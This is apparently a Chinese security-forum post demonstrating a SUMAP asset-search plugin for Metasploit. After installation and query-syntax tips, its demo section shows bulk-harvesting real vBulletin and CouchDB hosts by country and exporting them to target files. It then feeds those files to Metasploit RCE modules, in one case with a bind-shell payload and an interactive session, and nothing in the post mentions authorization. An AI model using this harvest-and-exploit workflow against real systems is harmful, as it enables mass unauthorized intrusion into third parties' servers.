-
-
[原创]SUMAP联动MSF
-
2021-9-2 17:10 7323
-
0x00 前言
前几天安恒SUMAP团队更新了新版的SDK3.0版本,附带了许多新功能以及新数据类型,BS的搜索语法可以在共用在SDK实现同一套查询语法。本次测试主要围绕sumap sdk 3.0的 MSF 联动 功能。
0x01 安装
1. 运行安装脚本
本次测试以为kali Linux为基础测试,解压sumap msf联动插件,目录有两个PY脚本文件:
1 2 | ├── setup.py └── sumap_search.py |
setup.py
是安装sumap MSF联动插件安装脚本,sumap_search.py
功能插件。setup.py
接受一个参数,参数是metasploit-framework所在目录。
1 2 | 1. kali默认msf路径 / usr / share 2. 如果msf是自定义安装,那么使用自定义安装目录 |
注意:kali原生的msf使用 python3 setup.py /usr/share/
安装
1 | python3 setup.py / opt |
界面返回:"module sumap_search installed susccessfully",插件已经安装成功。
setup.py
会自动将功能插件复制到~/.msf4/modules/auxiliary/gather
,为了确保正确安装,查看是否出现:
2. 设置SDK token
1 2 | export SUMAPTOKEN = xxxxx export SUMAPHOSTID = xxx |
3. 测试安装是否成功
0x02 查询技巧
SUMAP MSF联动插件具体有以下3个字段:
query
:查询数据file
:为空即屏幕输出,否则保存到文件size
:设置最大拖取数据
1. 通过tags查询巴西地区Docker的Harbor资产数据
1 2 3 | set query "tags:" harbor "&&country:" BR"" set file '' set size 3 |
2. 通过icon图标查询巴西地区Docker的Harbor资产数据
将harbor的ico进行hash计算后的结果传入查询
1 2 3 | set query "icohash:" - 510172706 "&&country:" BR"" set file '' set size 3 |
3. 高级与或非组合语法查询巴西地区Docker的Harbor资产数据
更新后的CS端支持高级查询方式,具体语法如下:
1 2 3 4 5 | 可以使用 && || ! 符号,如: 1 、domain: "aaa.com" &&!domain: "bbb.com" 2 、hostname: "powered by" ||!hostname: "discuz" 3 、!ip: "0.0.0.0/0" &&!port: 80 &&!port: 90 ||title: "xxxx" 4 、country: "巴西" &&ipv: "6" &&!port: "80" &&http_status: 200 &&!port: 90 ||title: "xxxx" |
例如,想要查询带有ico图标并且开在443端口的Harbor数据
1 2 3 | set query "tags:" harbor "&&port:443&&icohash:" - 510172706 "&&country:" BR"" set file '' set size 3 |
4. 一些需要避过的坑
由于MSF框架的JSON实现有bug:Encoding::UndefinedConversionError "\xE4" from ASCII-8BIT to UTF-8
,所以在输入中文查询时会出现错误:
这个bug,我们在测试时已提交给MSF官方了。所以我们在查询国别等带有中文字符时,可以用国家缩写代替,比如“瑞典”可以替换为"SE":
0x03 联动demo测试
联动测试论坛系统vBulletin
vBulletin是一个国外非常火热的论坛系统。在2020年时vBulletin5.6.2爆出了非常严重的无条件RCE漏洞:CVE-2019-16759绕过。其widget_tabbedContainer_tab_panel
组件存在模板注入,攻击者可以轻易的通过命令注入获得系统权限。
漏洞详细可参考 https://www.1337pwn.com/how-to-hack-vbulletin-5-6-0-5-6-2-using-zero-day-rce-exploit/
1. 通过sumap_search 批量导出数据
首先去SUMAP上查询数据量
设置查询语法
1234set
query
"data:"
vBulletin
5.6
.
2
"&&!data:"
UPnP
/
1.0
""
set
file
vbullentin.txt
set
size
47
run
2. 加载vBulletin的漏洞模块
加载vBulletin RCE
123451.
搜索vuBulletin相关漏洞
search vbulletin
2.
选中第四个
use
4
设置漏洞模块载荷
12345678910111213141.
设置stage类型,
1.
表示Unix命令执行
set
target
1
2.
设置目标主机
set
RHOSTS
file
:vbullentin.txt
3.
设置端口,这里我们设置为
443
set
RPORT
443
4.
设置https交互
set
SSL true
5.
设置执行的命令
set
CMD
id
开始测试:
run
查看测试成功的结果:
由于我们选择的是命令执行,不会建立session会话,所以直接在测试界面查看结果:
数据库CouchDB漏洞测试
CouchDB是Apache基金会开源的NoSQL数据库,专注于易用性。CouchDB一般开在5984端口,在CouchDB\<2.1.0版本存在Post-Auth RCE漏洞。在未设置登录或弱口令密码情况下,可通过json进行远程代码执行。
漏洞详情可参考https://www.exploit-db.com/exploits/44913
1. 通过sumap_search tags高级组合搜索语法
首先可以在SUMAP b/s测试搜索语句以及资产数量
设置查询语法
123set
query
"tags:\"couchdb\"&&!data:\"UPnP/1.0\"&&port:5984&&country:\"IN\""
set
file
couchdb
-
in
.txt
set
size
500
2. 加载couchdb漏洞模块
加载apache_couchdb_cmd_exec
1use exploit
/
linux
/
http
/
apache_couchdb_cmd_exec
设置漏洞载荷
123456781.
设置目标IP
set
RHOSTS
file
:couchdb
-
in
.txt
2.
设置目标端口
set
RPORT
5984
3.
设置payload载荷
set
payload payload
/
generic
/
shell_bind_tcp
开始测试:
run
查看结果:
sessions
执行命令:
sessions -i 1
进入shell
0x04 总结
本次测试sumap_sdk3.0 msf联动模块,简化用户在安全测试过程中的繁琐工作,同时对于网络空间测绘也进入到了一个新的高度和维度,实现了不同维度的资产搜索。期待后续sumap能有更新更强的功能发布。
sumap网址:https://sumap.dbappsecurity.com.cn/
[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界